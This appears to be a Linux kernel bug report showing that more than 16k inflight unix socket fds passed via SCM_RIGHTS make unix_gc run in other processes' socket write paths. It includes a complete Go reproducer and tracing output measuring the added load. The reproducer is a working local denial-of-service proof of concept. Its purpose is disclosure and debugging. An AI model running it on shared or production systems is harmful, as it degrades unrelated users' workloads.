unix_gc overload

@bobrik · Created October 19, 2023

The issue

The Linux kernel has a garbage collection mechanism for inflight unix sockets, i.e. socket file descriptors that were passed to other unix sockets but not yet received. This mechanism can be abused to impose excessive load on well-behaved processes that use regular unix sockets without any fd passing, because garbage collection is invoked in the socket write path.
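
A socket becomes "inflight" when its file descriptor is queued onto another unix socket as SCM_RIGHTS ancillary data and has not been received yet. A minimal sketch of that mechanism (separate from the attached repro, for illustration only):

package main

import (
    "syscall"
    "time"
)

func main() {
    // A connected pair of unix sockets to pass an fd over.
    pair, err := syscall.Socketpair(syscall.AF_UNIX, syscall.SOCK_STREAM, 0)
    if err != nil {
        panic(err)
    }

    // Any fd can be passed; a fresh unix socket mirrors what the repro sends.
    fd, err := syscall.Socket(syscall.AF_UNIX, syscall.SOCK_DGRAM, 0)
    if err != nil {
        panic(err)
    }

    // After this, the fd sits in pair[1]'s receive queue and counts as
    // inflight until the other end receives it, which never happens here.
    rights := syscall.UnixRights(fd)
    if err := syscall.Sendmsg(pair[0], nil, rights, nil, 0); err != nil {
        panic(err)
    }

    // The fd stays inflight until the process exits and the queue is
    // torn down; sleep so there's time to observe it.
    time.Sleep(time.Minute)
}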

The repro

The attached reproduction code in Go can be used to illustrate this:

$ go build -o /tmp/derp main.go && /tmp/derp
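
While it runs, the well-behaved connection logs a dot roughly every 50ms.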

What it does:

  1. Makes a unix connection to itself in a loop, writing some bytes and closing it every 50ms. This is the legitimate, well-behaved load.
  2. Makes a unix connection to itself and puts 16.1k unix socket fds inflight on it (161 sendmsg calls with 100 fds each, just over the 16k threshold). This is what forces unix_gc to run a lot more often for the well-behaved connection, which has nothing to do with fd passing.

With fewer than 16k file descriptors inflight, there's some gc, but not much:

$ sudo funclatency-bpfcc -uTi 1 unix_gc
Tracing 1 functions for "unix_gc"... Hit Ctrl-C to end.

22:08:34
     usecs               : count     distribution
         0 -> 1          : 0        |                                        |
         2 -> 3          : 0        |                                        |
         4 -> 7          : 0        |                                        |
         8 -> 15         : 0        |                                        |
        16 -> 31         : 0        |                                        |
        32 -> 63         : 0        |                                        |
        64 -> 127        : 0        |                                        |
       128 -> 255        : 0        |                                        |
       256 -> 511        : 0        |                                        |
       512 -> 1023       : 2        |*****                                   |
      1024 -> 2047       : 12       |**********************************      |
      2048 -> 4095       : 14       |****************************************|
      4096 -> 8191       : 6        |*****************                       |

avg = 2535 usecs, total: 86194 usecs, count: 34

These calls are triggered from unix_release_sock, which runs unix_gc on socket close as long as there are any inflight sockets present at all, no matter how many.

If you cross the threshold for the number of inflight sockets, it gets worse:

$ sudo funclatency-bpfcc -uTi 1 unix_gc
Tracing 1 functions for "unix_gc"... Hit Ctrl-C to end.

22:09:15
     usecs               : count     distribution
         0 -> 1          : 0        |                                        |
         2 -> 3          : 0        |                                        |
         4 -> 7          : 0        |                                        |
         8 -> 15         : 0        |                                        |
        16 -> 31         : 0        |                                        |
        32 -> 63         : 0        |                                        |
        64 -> 127        : 0        |                                        |
       128 -> 255        : 0        |                                        |
       256 -> 511        : 0        |                                        |
       512 -> 1023       : 456      |****************************************|
      1024 -> 2047       : 48       |****                                    |
      2048 -> 4095       : 2        |                                        |

avg = 979 usecs, total: 495498 usecs, count: 506

You can observe a lot more calls to unix_gc and a lot more total time spent in garbage collection. Most of the calls here are from unix_stream_sendmsg.
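
One way to confirm where the calls come from, assuming bpftrace is available, is to aggregate kernel stacks at unix_gc entry:

$ sudo bpftrace -e 'kprobe:unix_gc { @[kstack] = count(); }'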

main.go:
package main

import (
    "log"
    "net"
    "os"
    "syscall"
    "time"
)

const okayAddr = "/tmp/unix-gc-storm.okay.sock"
const churnAddr = "/tmp/unix-gc-storm.churn.sock"
const scmAddr = "/tmp/unix-gc-storm.scm.sock"

// startOkayListener opens a plain unix listener that does no fd passing.
func startOkayListener() net.Listener {
    os.Remove(okayAddr)

    listener, err := net.Listen("unix", okayAddr)
    if err != nil {
        panic(err)
    }

    return listener
}

// churnSockets is the legitimate, well-behaved load: connect to itself,
// write some bytes, close, and repeat every 50ms.
func churnSockets() {
    os.Remove(churnAddr)

    listener, err := net.Listen("unix", churnAddr)
    if err != nil {
        panic(err)
    }

    for {
        client, err := net.Dial("unix", churnAddr)
        if err != nil {
            panic(err)
        }

        server, err := listener.Accept()
        if err != nil {
            panic(err)
        }

        for i := 0; i < 50; i++ {
            _, err = client.Write([]byte("hiiii"))
            if err != nil {
                panic(err)
            }
        }

        server.Close()
        client.Close()

        log.Println(".")

        time.Sleep(time.Millisecond * 50)
    }
}

// scm puts 16.1k unix socket fds inflight by sending them as SCM_RIGHTS
// ancillary data over a connection that never reads them.
func scm() net.Listener {
    os.Remove(scmAddr)

    listener, err := net.Listen("unix", scmAddr)
    if err != nil {
        panic(err)
    }

    scmConn, err := net.Dial("unix", scmAddr)
    if err != nil {
        panic(err)
    }

    scmConnFile, err := scmConn.(*net.UnixConn).File()
    if err != nil {
        panic(err)
    }

    // Use 159 for less load or 161 for more load.
    // The difference here is crossing the threshold:
    // * https://elixir.bootlin.com/linux/v6.1/source/net/unix/garbage.c#L198
    //
    // As long as there are more than 16k inflight sockets, unix_gc starts
    // to run in the unix socket write path, causing a lot more load:
    // * https://elixir.bootlin.com/linux/v6.1/source/net/unix/af_unix.c#L2158
    //
    // The load is applied to any socket, not just the offending one.
    for i := 0; i < 161; i++ {
        fds := []int{}
        for i := 0; i < 100; i++ {
            fd, err := syscall.Socket(syscall.AF_UNIX, syscall.SOCK_DGRAM, 0)
            if err != nil {
                panic(err)
            }
            fds = append(fds, fd)
        }

        rights := syscall.UnixRights(fds...)
        err = syscall.Sendmsg(int(scmConnFile.Fd()), nil, rights, nil, 0)
        if err != nil {
            panic(err)
        }
    }

    return listener
}

func main() {
    okayListener := startOkayListener()
    scmListener := scm()

    churnSockets()

    okayListener.Close()
    scmListener.Close()
}
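
To compare the two regimes, change the outer loop in scm() from 161 to 159 iterations: 159 × 100 = 15.9k inflight fds stays under the 16k threshold, while 161 × 100 = 16.1k crosses it, producing the difference between the two funclatency histograms above.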